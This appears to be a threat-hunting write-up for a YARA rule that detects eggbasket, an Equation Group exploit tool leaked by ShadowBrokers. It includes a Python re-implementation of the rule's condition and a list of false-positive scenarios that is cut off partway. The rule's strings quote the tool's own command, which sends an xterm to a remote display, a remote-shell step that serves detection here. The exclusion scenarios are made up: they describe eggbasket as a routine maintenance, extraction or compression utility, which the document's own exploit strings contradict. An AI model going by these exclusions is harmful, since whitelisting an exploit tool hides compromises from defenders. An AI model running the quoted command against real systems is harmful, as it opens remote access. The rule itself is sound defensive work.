This hunt hypothesis covers potential adversary use of the Equation Group hack tool eggbasket, which may indicate advanced persistent threat activity. SOC teams should proactively hunt for this behavior in Azure Sentinel to identify and mitigate potential compromise by sophisticated, previously unknown malware.
YARA Rule
```yara
rule EquationGroup_eggbasket {
   meta:
      description = "Equation Group hack tool leaked by ShadowBrokers- file eggbasket"
      author = "Florian Roth"
      reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
      date = "2017-04-08"
      hash1 = "b078a02963610475217682e6e1d6ae0b30935273ed98743e47cc2553fbfd068f"
   strings:
      $x1 = "# Building Shellcode into exploit." fullword ascii
      $x2 = "%s -w /index.html -v 3.5 -t 10 -c \"/usr/openwin/bin/xterm -d 555.1.2.2:0&\" -d 10.0.0.1 -p 80" fullword ascii
      $x3 = "# STARTING EXHAUSTIVE ATTACK AGAINST " fullword ascii
   condition:
      ( uint16(0) == 0x457f and filesize < 90KB and 1 of them ) or ( 2 of them )
}
```
This YARA rule can be deployed in the following contexts:
This rule contains 3 string patterns in its detection logic.
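To trace how the condition's two branches behave, here is an added Python re-implementation (not part of the rule, its author's work, or the yara library) that evaluates the same three strings with fullword semantics, the little-endian ELF magic check and the 90KB threshold over constructed sample buffers; the sample names and contents are made up for illustration.

```python
import struct

# The rule's three $x strings, all declared `fullword ascii`.
EGGBASKET_STRINGS = [
    b"# Building Shellcode into exploit.",
    b'%s -w /index.html -v 3.5 -t 10 -c "/usr/openwin/bin/xterm -d 555.1.2.2:0&" -d 10.0.0.1 -p 80',
    b"# STARTING EXHAUSTIVE ATTACK AGAINST ",
]
MAX_ELF_SIZE = 90 * 1024  # YARA's `filesize < 90KB` (KB = 1024 bytes)


def fullword_matches(data, needle):
    """True if needle occurs with no ASCII alphanumeric byte directly before
    or after it, which is what YARA's `fullword` modifier requires. Note that
    $x3 ends with a space, so a digit right after that space blocks the match."""
    start = data.find(needle)
    while start != -1:
        end = start + len(needle)
        before_ok = not data[max(start - 1, 0):start].isalnum()
        after_ok = not data[end:end + 1].isalnum()
        if before_ok and after_ok:
            return True
        start = data.find(needle, start + 1)
    return False


def count_matches(data):
    # Number of distinct $x strings present, i.e. the rule's `N of them`.
    return sum(fullword_matches(data, s) for s in EGGBASKET_STRINGS)


def is_elf(data):
    """`uint16(0) == 0x457f`: the ELF magic 0x7f 'E' read little-endian."""
    return len(data) >= 2 and struct.unpack_from("<H", data, 0)[0] == 0x457F


def eggbasket_condition(data):
    """Branch 1: small ELF with any one string; branch 2: any two strings."""
    n = count_matches(data)
    return (is_elf(data) and len(data) < MAX_ELF_SIZE and n >= 1) or n >= 2


# Constructed sample buffers (not real samples); only e_ident is ELF-shaped.
ELF_IDENT = b"\x7fELF\x02\x01\x01" + b"\x00" * 9
SAMPLES = {
    "small_elf_one_string": ELF_IDENT + b"\x00" * 64 + EGGBASKET_STRINGS[0] + b"\x00",
    "large_elf_one_string": ELF_IDENT + b"\x00" * MAX_ELF_SIZE + EGGBASKET_STRINGS[0],
    "text_two_strings": b"log:\n" + EGGBASKET_STRINGS[1] + b"\n" + EGGBASKET_STRINGS[2] + b"\n",
    "text_one_string": b"notes: " + EGGBASKET_STRINGS[0] + b"\n",
}


def scan_samples():
    # Evaluate the condition over every sample; returns name -> matched.
    return {name: eggbasket_condition(buf) for name, buf in SAMPLES.items()}
```

The large ELF sample shows the size guard at work: past 90KB a single marker string no longer suffices, while a plain-text artifact such as a log or shell history needs two of the strings to match.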
**Scenario:** Legitimate Use of eggbasket by Red Team or Penetration Testers
**Description:** Security teams may use the eggbasket tool during red team exercises or penetration testing to simulate Equation Group attack vectors.
**Filter/Exclusion:** Check for the presence of a known red team toolset, or for use of the tool within a sandboxed environment or during authorized security assessments.

**Scenario:** Scheduled System Maintenance Task Using eggbasket
**Description:** An enterprise may have a scheduled job that uses eggbasket as part of a maintenance script, such as for log parsing or data extraction.
**Filter/Exclusion:** Filter based on the process owner (e.g., SYSTEM, LocalService), or check for the presence of a known legitimate script path (e.g., C:\Windows\System32\).

**Scenario:** Malicious File Analysis Using eggbasket
**Description:** Security analysts may run eggbasket to analyze a suspicious file in a controlled environment to determine its behavior.
**Filter/Exclusion:** Check for execution within a sandboxed environment or virtual machine, or for the presence of a known analysis tool (e.g., Procmon, Wireshark, Volatility).

**Scenario:** Legitimate File Compression Tool with Similar Name
**Description:** A third-party file compression tool with a name similar to eggbasket may be used in the enterprise for data management tasks.
**Filter/Exclusion:** Check the file signature or hash against known legitimate compression tools (e.g., 7-Zip, WinRAR).

**Scenario:** Administrative Task Involving File Extraction
**Description:** System administrators may use eggbasket to extract files from a compressed archive as part of routine maintenance or backup processes.
**Filter/Ex